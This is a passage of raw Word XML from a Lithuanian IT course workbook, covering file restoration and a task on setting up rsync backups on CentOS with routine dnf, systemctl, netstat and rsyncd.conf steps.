        </w:rPr>
        <w:t>,Atkurti, kad išsaugotumėte j</w:t>
      </w:r>
      <w:r w:rsidR="4477C156" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pradinėje vietoje“. Norėdami išsaugoti jį kitoje vietoje, dešiniuoju pelės mygtuku spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="003A637D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Atkurti“, pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="003A637D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Atkurti į</w:t>
      </w:r>
      <w:r w:rsidR="003A637D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tada pasirinkite vietą</w:t>
      </w:r>
      <w:r w:rsidR="09FD1069" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kurioje bus išsaugot</w:t>
      </w:r>
      <w:r w:rsidR="377D3233" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as failas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D50F7" w14:textId="098148FC" w:rsidR="007C1E8E" w:rsidRPr="005A5C28" w:rsidRDefault="007C1E8E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DED2DCB" w14:textId="77777777" w:rsidR="002A5374" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374"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10 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASINAUDOJANT LINUX OPERACINĖS SISTEMOS ĮRANKIAIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F027A9F" w14:textId="77777777" w:rsidR="002A5374" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374"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 xml:space="preserve">SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3F233" w14:textId="336F8E21" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti ekrano vaizdus arba apra</w:t>
      </w:r>
      <w:r w:rsidR="1BF020B8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yti</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip sukuriamos duomenų kopijos naudojantis</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002A5374" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS įrankiais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39378705" w14:textId="2C3909F2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F4B87" w14:textId="2F6C9926" w:rsidR="00D33249" w:rsidRPr="005A5C28" w:rsidRDefault="00D33249" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EB2AB" w14:textId="19EFDF90" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Diegiami „Rsync“ paketai</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C5C50" w14:textId="49499351" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Patikrinkime, ar įdiegti reikalingi „Rsync“ paketa</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i. Jei ne,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įdiekite juos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DFF857" w14:textId="412D62B6" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dnf install rsync rsync-daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF5A5B" w14:textId="71C25D4A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paleiskite „Rsync“</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>daemon tarnybą ir įgalinkite jo automatinį paleidimą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAE847" w14:textId="5E66F6EF" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>systemctl enable --now rsyncd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C2880" w14:textId="4D257A1E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Patikrinkite, ar automatinis paleidimas įjungtas ir veikia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D373D97" w14:textId="1604D1ED" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>systemctl status rsyncd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BBF0C" w14:textId="6A69332E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rsyncd.service - fast remote file copy program daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D6A54" w14:textId="496113B0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Loaded: loaded (/usr/lib/systemd/system/rsyncd.service; enabled; vendor preset: disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D75646F" w14:textId="10CF9B60" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Active: active (running) since Sat 2020-12-19 13:18:16 UTC; 6s ago</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189F233" w14:textId="199CA089" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2693D5D4" w14:textId="07945803" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Patikrinkite, ar „Rsync“ paslauga </w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reagu</w:t>
      </w:r>
      <w:r w:rsidR="2BFA4DB7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ja į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklo prievad</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699832C0" w14:textId="14B82325" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>netstat -tulpn | grep rsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CCD62" w14:textId="2146FE54" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp 0 0 0.0.0.0:873 0.0.0.0:* LISTEN 55746/rsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2DB07" w14:textId="590EA3A9" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp6 0 0 :::873 :::* LISTEN 55746/rsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560826F7" w14:textId="33A1D21B" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA1A93F" w14:textId="28E1D2AF" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Konfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="00F3B6A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> atsarginio šaltinio server</w:t>
      </w:r>
      <w:r w:rsidR="0DBCF5A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidR="414A54CF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC8B07" w14:textId="759E62BE" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidarykite konfigūracijos failą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181ADA19" w14:textId="7451CC0B" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nano /etc/rsyncd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A30DAB" w14:textId="6EC14C3C" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779D9B55" w14:textId="6B9BE9BF" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Įterpkite šias eilutes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54467EE2" w14:textId="25A982B0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># Rsync daemon global config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE4DAA" w14:textId="2B71F0AA" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pid file = /var/run/rsyncd.pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824BE94" w14:textId="3FBCFE97" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># User name and group for reading source files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466C99F" w14:textId="3099D852" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uid = rsync-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551329E" w14:textId="610122EC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gid = rsync-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C1B5CB" w14:textId="7DC040E3" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># Do not allow to modify the source files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EEE456" w14:textId="4F4BEF25" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>read only = yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60721850" w14:textId="549C4578" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># Data Source Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0019D" w14:textId="2FF0FD1D" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>[data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D5BBF" w14:textId="4C884BED" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
